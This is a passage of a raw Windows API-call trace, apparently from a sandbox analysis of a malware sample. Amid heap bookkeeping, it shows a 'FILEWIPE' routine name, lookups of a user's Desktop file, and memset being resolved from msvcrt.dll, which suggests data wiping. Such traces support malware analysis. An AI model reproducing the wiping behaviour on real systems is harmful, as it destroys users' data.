HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0168.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.268] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.268] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\we2ef3.flv")) returned 0x20 [0168.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0168.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.270] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e64a30, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x3c03b0, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0x3c03b0, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="wE2eF3.flv", cAlternateFileName="")) returned 0x90af58 [0168.271] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.271] CharLowerBuffW (in: lpsz="byte[91549]", cchLength=0xb | out: lpsz="byte[91549]") returned 0xb [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.273] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.274] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0168.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.275] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0168.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26c8 [0168.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0168.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.276] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0168.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.278] FreeLibrary (hLibModule=0x75c90000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 